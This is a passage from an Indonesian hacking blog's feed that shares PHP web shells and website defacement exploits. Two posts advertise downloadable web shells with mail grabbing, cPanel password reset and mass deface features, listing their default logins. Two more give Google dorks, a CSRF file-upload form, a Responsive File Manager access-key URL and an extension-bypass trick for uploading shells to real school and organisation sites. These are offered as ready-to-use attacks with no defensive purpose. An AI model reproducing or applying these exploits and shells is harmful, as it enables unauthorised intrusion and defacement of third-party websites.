width="72"/><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2116688564507620479.post-6558526096460507986</id><published>2020-08-20T00:23:00.000+07:00</published><updated>2020-08-20T00:23:11.760+07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Shell"/><title type='text'>BHIOFF Shell With Authenticate Login</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_eWaRKC18Hf6YYz4JqThZn4ErV0F5CyR41svvaJPd-DZUJ68mkBaB4HlcQorWD4-CLtE-vl_RiqUozrqxc1iKXLJ6Z-tCGYjTtDetZweKPmbicHUKWFUlCRSfO7GiIyL-J2TDj9BfSmrs/s1600/%25F0%259F%2594%2592B.H.I%2528OFFICAL%2529%25F0%259F%2594%2593+20190921_172151.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;240&quot; data-original-width=&quot;240&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_eWaRKC18Hf6YYz4JqThZn4ErV0F5CyR41svvaJPd-DZUJ68mkBaB4HlcQorWD4-CLtE-vl_RiqUozrqxc1iKXLJ6Z-tCGYjTtDetZweKPmbicHUKWFUlCRSfO7GiIyL-J2TDj9BfSmrs/s1600/%25F0%259F%2594%2592B.H.I%2528OFFICAL%2529%25F0%259F%2594%2593+20190921_172151.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Balik Lagi Ama Saya Yap Kali Ini Saya Akan Share Shell Baru Saya Yaitu Bernama BHIOFF Shell&lt;br /&gt;
&lt;br /&gt;
Langsung Aja Di Shell Kali Ini Saya Menggunakan Login Authenticate Atau Autentikasi Login Seperti Ini Gan...&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg__5x5QjR4JC-Q9FmhRar7Vdv6jT39rZHWVbyJAfrRogs3SJImOT7XesT3Hyj1rO41WaQAuBv3mkyWK6Pw3jV8eoNXr3BwDzzmG_H3uCDo9yZ8xXK3eGZbF1nNSPx42YgIx2jA1_82IxIr/s1600/S00819-235524.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1280&quot; data-original-width=&quot;720&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg__5x5QjR4JC-Q9FmhRar7Vdv6jT39rZHWVbyJAfrRogs3SJImOT7XesT3Hyj1rO41WaQAuBv3mkyWK6Pw3jV8eoNXr3BwDzzmG_H3uCDo9yZ8xXK3eGZbF1nNSPx42YgIx2jA1_82IxIr/s320/S00819-235524.jpg&quot; width=&quot;180&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Untuk Fitur :&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Symlink (Symlink 404/403)&lt;/li&gt;
&lt;li&gt;Config&lt;/li&gt;
&lt;li&gt;Jumping&lt;/li&gt;
&lt;li&gt;Mail Grabber&lt;/li&gt;
&lt;li&gt;Cpanel Reset Pass&lt;/li&gt;
&lt;li&gt;Dll&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
Untuk Default User/Pass :&lt;/div&gt;
&lt;div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;u&gt;dmzhari&lt;/u&gt;/&lt;u&gt;ecchi&lt;/u&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
Untuk Gambar Dari Shellnya :&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9F4e5kL6yGqGDhT93yqvTz169OBmmtkvQdrCeZceCu3-lTexktS9X2BPxBx1puQ1M9hl0vIV2mrt0HIykEumiAiiJUau3v4M2-NiB7wDxEadmaPLFemIlWuEM1NzFICpduHJd8gzW74T6/s1600/S00819-235721.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1280&quot; data-original-width=&quot;720&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9F4e5kL6yGqGDhT93yqvTz169OBmmtkvQdrCeZceCu3-lTexktS9X2BPxBx1puQ1M9hl0vIV2mrt0HIykEumiAiiJUau3v4M2-NiB7wDxEadmaPLFemIlWuEM1NzFICpduHJd8gzW74T6/s320/S00819-235721.jpg&quot; width=&quot;180&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Jika Kalian Suka Kalian Bisa Download&lt;br /&gt;
&lt;br /&gt;
&lt;a class=&quot;btn-slide2-diru&quot; href=&quot;https://pastebin.com/xvtE6rXh&quot; target=&quot;_blank&quot;&gt;&lt;span class=&quot;circle2&quot;&gt;&lt;i class=&quot;fa fa-download&quot;&gt;&lt;/i&gt;&lt;/span&gt;
  &lt;span class=&quot;title2&quot;&gt;&lt;/span&gt;
  &lt;span class=&quot;title-hover2&quot;&gt;Disini&lt;/span&gt;&lt;/a&gt;&amp;nbsp;atau&amp;nbsp;&lt;a class=&quot;btn-slide2-diru&quot; href=&quot;https://github.com/dmzhari/BHI-Shell&quot; target=&quot;_blank&quot;&gt;&lt;span class=&quot;circle2&quot;&gt;&lt;i class=&quot;fa fa-download&quot;&gt;&lt;/i&gt;&lt;/span&gt;
  &lt;span class=&quot;title2&quot;&gt;&lt;/span&gt;
  &lt;span class=&quot;title-hover2&quot;&gt;Disini&lt;/span&gt;
&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='https://ecchiexploit.blogspot.com/feeds/6558526096460507986/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='https://ecchiexploit.blogspot.com/2020/08/bhioff-shell-with-authenticate-login.html#comment-form' title='1 Komentar'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/6558526096460507986'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/6558526096460507986'/><link rel='alternate' type='text/html' href='https://ecchiexploit.blogspot.com/2020/08/bhioff-shell-with-authenticate-login.html' title='BHIOFF Shell With Authenticate Login'/><author><name>Hari | ./EcchiExploit</name><uri>http://www.blogger.com/profile/05595060091488928047</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdAm9oQZUtl-mM7sSuIp2I9yPPKDz8At2k4IzLqjfXGl8guU-WaeH7fwVxXSGHbx0vRxEOdAPYRxmIBz7mnAa3_JXtIK3WOUO_7n3Qgxl-0bbpfnogLIAFC_6yDakniA/s220/IMG-20200408-WA0076.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_eWaRKC18Hf6YYz4JqThZn4ErV0F5CyR41svvaJPd-DZUJ68mkBaB4HlcQorWD4-CLtE-vl_RiqUozrqxc1iKXLJ6Z-tCGYjTtDetZweKPmbicHUKWFUlCRSfO7GiIyL-J2TDj9BfSmrs/s72-c/%25F0%259F%2594%2592B.H.I%2528OFFICAL%2529%25F0%259F%2594%2593+20190921_172151.jpg" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2116688564507620479.post-3601815043107853885</id><published>2020-08-10T03:03:00.000+07:00</published><updated>2020-08-10T03:03:11.062+07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Shell"/><title type='text'>Zero Two Shell</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxvGBTXkm-VySDwhIR3wSVf2YEErFCwWomHGYZmrzH9HVF5CNn1vJu7K1mEF4Zg45irn9D8a3q-lHlBR5bauJN04ZvgDfOcmoVZM-n7zJNXlQhPGWuGBYWsaQBzyP_IiwpidXMxk1-TTNi/s1600/IMG-20200809-WA0161.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;720&quot; data-original-width=&quot;720&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxvGBTXkm-VySDwhIR3wSVf2YEErFCwWomHGYZmrzH9HVF5CNn1vJu7K1mEF4Zg45irn9D8a3q-lHlBR5bauJN04ZvgDfOcmoVZM-n7zJNXlQhPGWuGBYWsaQBzyP_IiwpidXMxk1-TTNi/s320/IMG-20200809-WA0161.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Hallo Gan...&lt;br /&gt;
Kali Ini Saya Akan Share Shell Baru...&lt;br /&gt;
&lt;br /&gt;
Untuk Tampilan Kalian Bisa Lihat Di Bawah...&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgycj4zKXv7CZ2Agyl0KbuZMoXvDPsyoKn-J-3Rf7l-Zk2XtoGMPrAsEPVUO5FXSSeZtQr4Ra7OVB8iqzi7h4qRm1FXqa20khxxCTdY1RyKYS5n5IM0SCzgItrnrFCBNhu0UIeU9IapeVuS/s1600/S00810-024219.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1280&quot; data-original-width=&quot;720&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgycj4zKXv7CZ2Agyl0KbuZMoXvDPsyoKn-J-3Rf7l-Zk2XtoGMPrAsEPVUO5FXSSeZtQr4Ra7OVB8iqzi7h4qRm1FXqa20khxxCTdY1RyKYS5n5IM0SCzgItrnrFCBNhu0UIeU9IapeVuS/s320/S00810-024219.jpg&quot; width=&quot;180&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1_NcLqARh13NSvWx4A5BEv41xLY5phPuLdusBflVE-V8XnVRQSIHDbm5guvo-o91BzdKuGQ0kebdsRmVOwSnMlHt7IomCNsDk8GOKhYmANBsaB4AWa43SswnspeLDbuQejVOEohyCAqvJ/s1600/S00810-024302.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1280&quot; data-original-width=&quot;720&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1_NcLqARh13NSvWx4A5BEv41xLY5phPuLdusBflVE-V8XnVRQSIHDbm5guvo-o91BzdKuGQ0kebdsRmVOwSnMlHt7IomCNsDk8GOKhYmANBsaB4AWa43SswnspeLDbuQejVOEohyCAqvJ/s320/S00810-024302.jpg&quot; width=&quot;180&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Fitur :&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;ol&gt;
&lt;li&gt;&lt;i&gt;Symlink (Sym v2/Sym404)&lt;/i&gt;&lt;/li&gt;
&lt;li&gt;&lt;i&gt;Jumping&amp;nbsp;&lt;/i&gt;&lt;/li&gt;
&lt;li&gt;&lt;i&gt;Mass Tool (Deface/Delete/)&lt;/i&gt;&lt;/li&gt;
&lt;li&gt;&lt;i&gt;Mail Grabber&lt;/i&gt;&lt;/li&gt;
&lt;li&gt;&lt;i&gt;Adminer&lt;/i&gt;&lt;/li&gt;
&lt;li&gt;&lt;i&gt;Login Shell With User, Pass And Email&lt;/i&gt;&lt;/li&gt;
&lt;li&gt;&lt;i&gt;Dll..&amp;nbsp;&lt;/i&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;ul&gt;
&lt;li&gt;Login&lt;i&gt;&amp;nbsp;&lt;/i&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;font-style: italic;&quot;&gt;
&lt;ol&gt;
&lt;li&gt;&lt;i&gt;&lt;div&gt;
Default User :&amp;nbsp; &lt;u&gt;dmzhari&lt;/u&gt;&lt;/div&gt;
&lt;/i&gt;&lt;/li&gt;
&lt;li&gt;&lt;div&gt;
Default Pass : &lt;u&gt;ecchi&lt;/u&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div&gt;
Default Email : &lt;u&gt;zerotwo@gmail.com&lt;/u&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;/div&gt;
&lt;div&gt;
Jika Kalian Suka Kalian Bisa Download Di Bawah Gan&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Download :&lt;/div&gt;
&lt;a class=&quot;btn-slide2-diru&quot; href=&quot;https://pastebin.com/NvHcrpVc&quot; target=&quot;_blank&quot;&gt;
&lt;span class=&quot;circle2&quot;&gt;
&lt;i class=&quot;fa fa-download&quot;&gt;
&lt;/i&gt;
&lt;/span&gt;
&lt;span class=&quot;title2&quot;&gt;&lt;/span&gt;
&lt;span class=&quot;title-hover2&quot;&gt; Disini&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Atau&lt;br /&gt;
&lt;br /&gt;
Download :&lt;br /&gt;
&lt;a class=&quot;btn-slide2-diru&quot; href=&quot;https://www3.zippyshare.com/v/iq3qSQTe/file.html&quot; target=&quot;_blank&quot;&gt;&lt;span class=&quot;circle2&quot;&gt;&lt;i class=&quot;fa fa-download&quot;&gt;&lt;/i&gt;&lt;/span&gt;
  &lt;span class=&quot;title2&quot;&gt;&lt;/span&gt;
  &lt;span class=&quot;title-hover2&quot;&gt;Disini&lt;/span&gt;
&lt;/a&gt;
</content><link rel='replies' type='application/atom+xml' href='https://ecchiexploit.blogspot.com/feeds/3601815043107853885/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='https://ecchiexploit.blogspot.com/2020/08/zero-two-shell.html#comment-form' title='1 Komentar'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/3601815043107853885'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/3601815043107853885'/><link rel='alternate' type='text/html' href='https://ecchiexploit.blogspot.com/2020/08/zero-two-shell.html' title='Zero Two Shell'/><author><name>Hari | ./EcchiExploit</name><uri>http://www.blogger.com/profile/05595060091488928047</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdAm9oQZUtl-mM7sSuIp2I9yPPKDz8At2k4IzLqjfXGl8guU-WaeH7fwVxXSGHbx0vRxEOdAPYRxmIBz7mnAa3_JXtIK3WOUO_7n3Qgxl-0bbpfnogLIAFC_6yDakniA/s220/IMG-20200408-WA0076.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxvGBTXkm-VySDwhIR3wSVf2YEErFCwWomHGYZmrzH9HVF5CNn1vJu7K1mEF4Zg45irn9D8a3q-lHlBR5bauJN04ZvgDfOcmoVZM-n7zJNXlQhPGWuGBYWsaQBzyP_IiwpidXMxk1-TTNi/s72-c/IMG-20200809-WA0161.jpg" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2116688564507620479.post-6691990399165216809</id><published>2020-07-21T06:17:00.000+07:00</published><updated>2020-07-21T06:17:15.388+07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Deface"/><title type='text'>Exploit Fr. Evan Gomes SVD File Upload</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4eRO0vSAcLT4o5PGWDwzseCGwf9sEfgp1fjWl6kFQzM0aApT1sO3UrlILDHMwEy3prVVlZWtzVMx7PCaaLN0lxVQGQYIVNWjoZ5y7noS9V6_kd4y9DjJynTjTm26_wA2zItqUO95L3Qox/s1600/FB_IMG_15949724323993541.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;900&quot; data-original-width=&quot;720&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4eRO0vSAcLT4o5PGWDwzseCGwf9sEfgp1fjWl6kFQzM0aApT1sO3UrlILDHMwEy3prVVlZWtzVMx7PCaaLN0lxVQGQYIVNWjoZ5y7noS9V6_kd4y9DjJynTjTm26_wA2zItqUO95L3Qox/s320/FB_IMG_15949724323993541.jpg&quot; width=&quot;256&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Hallo Gan :v&lt;br /&gt;
Kali Ini Saya Akan Share Exploit Baru Wkwkw..&lt;br /&gt;
&lt;br /&gt;
Mungkin Kalian Sudah Tahu Nama Titlenya Yaps Ini Adalah Deface Fr. Evan Gomes SVD Dafault User/Pass Yang Saya Baca Dari Salah 1 Blog Yang Bernama&amp;nbsp;&lt;a href=&quot;https://www.22xploitercrew.com/2020/07/fr-evan-gomes-svd-default.html?m=1&quot; target=&quot;_blank&quot;&gt;22xploitercrew&lt;/a&gt;&amp;nbsp;Karna Saya Ingin Tahu Lalu Saya Cari Exploit Lain Dan Akhirnya Ketemu Wkwk..&lt;br /&gt;
&lt;br /&gt;
Nah Di Exploit Ini Kalian Tinggal Upload Shell Saja Tanpa Harus Menggunakan Default User/Pass Nya Lagi..&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Exploit :&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;i&gt;&lt;u&gt;/modules/admin/add_user.php&lt;/u&gt;&lt;/i&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Dork&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;i&gt;&lt;u&gt;intext:Fr. Evan Gomes SVD site:in&lt;/u&gt;&lt;/i&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Csrf :&lt;/li&gt;
&lt;/ul&gt;
&lt;table cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;th&gt;&lt;div style=&quot;overflow: auto; text-align: left;&quot;&gt;
&amp;lt;form method=&quot;post&quot; action=&quot;https://site.com/modules/admin/add_user.php&quot; enctype=&quot;multipart/form-data&quot;&amp;gt;&lt;br /&gt;
&amp;lt;input name=&quot;image&quot; type=&quot;file&quot; id=&quot;last-name2&quot;&amp;gt;&lt;br /&gt;
&amp;lt;input type=&quot;submit&quot; name=&quot;add_user&quot; value=&quot;Upload&quot;&amp;gt;&lt;br /&gt;
&amp;lt;/form&amp;gt;&lt;/div&gt;
&lt;/th&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;&lt;i&gt;Note : Disaat Kalian Masukan Exploitnya Dan Teredeirect Ke Tampilan Index Atau Web Depannya Artinya Vuln&lt;/i&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;Akses Shell :&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;i&gt;&lt;u&gt;http://site.com/images/shell.php&lt;/u&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;i&gt;&lt;u&gt;Or&lt;/u&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;i&gt;&lt;u&gt;http://site.com/[patch]/images/shell.php&lt;/u&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;i&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
Yap Segitu Aja Gan Untuk Exploit Kali Ini Semoga Berhasil...&amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
Thanks To 22xploitercrew&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='https://ecchiexploit.blogspot.com/feeds/6691990399165216809/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='https://ecchiexploit.blogspot.com/2020/07/exploit-fr-evan-gomes-svd-file-upload.html#comment-form' title='1 Komentar'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/6691990399165216809'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/6691990399165216809'/><link rel='alternate' type='text/html' href='https://ecchiexploit.blogspot.com/2020/07/exploit-fr-evan-gomes-svd-file-upload.html' title='Exploit Fr. Evan Gomes SVD File Upload'/><author><name>Hari | ./EcchiExploit</name><uri>http://www.blogger.com/profile/05595060091488928047</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdAm9oQZUtl-mM7sSuIp2I9yPPKDz8At2k4IzLqjfXGl8guU-WaeH7fwVxXSGHbx0vRxEOdAPYRxmIBz7mnAa3_JXtIK3WOUO_7n3Qgxl-0bbpfnogLIAFC_6yDakniA/s220/IMG-20200408-WA0076.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4eRO0vSAcLT4o5PGWDwzseCGwf9sEfgp1fjWl6kFQzM0aApT1sO3UrlILDHMwEy3prVVlZWtzVMx7PCaaLN0lxVQGQYIVNWjoZ5y7noS9V6_kd4y9DjJynTjTm26_wA2zItqUO95L3Qox/s72-c/FB_IMG_15949724323993541.jpg" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2116688564507620479.post-3068795141856026297</id><published>2020-07-06T00:10:00.000+07:00</published><updated>2020-07-06T00:11:51.842+07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Deface"/><title type='text'>PPDB RFM (Responsive File Manager)</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioViSiK0J_l6XJUiioEO3TjbC1OaEy8QOBvORXTZBTM7hxfXwNoUqPa9lerZqat904F4GBIiYDGE7GOc2_55IHnTIVFyGoAa-0yj5nfBSgjKiiTy-FO4FmCfsz9MElOu-CXuljXoRJoHwf/s1600/FB_IMG_15937403497130278.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;492&quot; data-original-width=&quot;720&quot; height=&quot;218&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioViSiK0J_l6XJUiioEO3TjbC1OaEy8QOBvORXTZBTM7hxfXwNoUqPa9lerZqat904F4GBIiYDGE7GOc2_55IHnTIVFyGoAa-0yj5nfBSgjKiiTy-FO4FmCfsz9MElOu-CXuljXoRJoHwf/s320/FB_IMG_15937403497130278.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Dah Lama Gak Buat Content Di Blog Wkwkw&lt;br /&gt;
Nah Kali Ini Gua Akan Share Cara Deface PPDB RFM..&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Dork :&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;i&gt;&lt;u&gt;intext:© PPDB MADRASAH site:sch.id&lt;/u&gt;&lt;/i&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Exploit :&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;i&gt;&lt;u&gt;/plugin/filemanager/dialog.php?akey=4r5S-KduJ7ts098&lt;/u&gt;&lt;/i&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Akses Shell :&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;i&gt;&lt;u&gt;http://ppdb.sch.id/media/source/shell.php&lt;/u&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;i&gt;Or&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;i&gt;&lt;u&gt;http://ppdb.sch.id/[patch]/media/source/shell.php&lt;/u&gt;&lt;/i&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Biasa Dorking Dulu Gunain Dork Di Atas&lt;/li&gt;
&lt;li&gt;Jika Sudah Dorking Kalian Cari Web Yang Menurut Kalian Vuln&lt;/li&gt;
&lt;li&gt;Nah Kalo Dah Dapet Webnya Tinggal Masukin Exploitnya&lt;/li&gt;
&lt;li&gt;Nah Ntar Akan Ke Redirect Ke Filemanagernya Kalian Upload Shell Kalian Dengan Ext. namashell.php&amp;lt;?.txt&lt;/li&gt;
&lt;li&gt;Gak Perlu Tamper Langsung Terdeteksi Dengan Ext. php&lt;/li&gt;
&lt;li&gt;Nah Kalo Dah Terupload Tinggal Ke Akses Shellnya&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Maaf Kalo Gak Ama Gambarnya Soalnya Gua Males Harus Nangkep Gambar Sana Sini :v&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Sekian Dan Happy Exploiter :v&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='https://ecchiexploit.blogspot.com/feeds/3068795141856026297/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='https://ecchiexploit.blogspot.com/2020/07/ppdb-rfm-responsive-file-manager.html#comment-form' title='2 Komentar'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/3068795141856026297'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/3068795141856026297'/><link rel='alternate' type='text/html' href='https://ecchiexploit.blogspot.com/2020/07/ppdb-rfm-responsive-file-manager.html' title='PPDB RFM (Responsive File Manager)'/><author><name>Hari | ./EcchiExploit</name><uri>http://www.blogger.com/profile/05595060091488928047</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdAm9oQZUtl-mM7sSuIp2I9yPPKDz8At2k4IzLqjfXGl8guU-WaeH7fwVxXSGHbx0vRxEOdAPYRxmIBz7mnAa3_JXtIK3WOUO_7n3Qgxl-0bbpfnogLIAFC_6yDakniA/s220/IMG-20200408-WA0076.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioViSiK0J_l6XJUiioEO3TjbC1OaEy8QOBvORXTZBTM7hxfXwNoUqPa9lerZqat904F4GBIiYDGE7GOc2_55IHnTIVFyGoAa-0yj5nfBSgjKiiTy-FO4FmCfsz9MElOu-CXuljXoRJoHwf/s72-c/FB_IMG_15937403497130278.jpg" height="72" width="72"/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2116688564507620479.post-4011389657897004618</id><published>2020-06-15T02:30:00.002+07:00</published><updated>2020-06-15T22:21:53.930+07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Deface"/><title type='text'>E-Learning App (Not Moodle) File Upload With Csrf</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
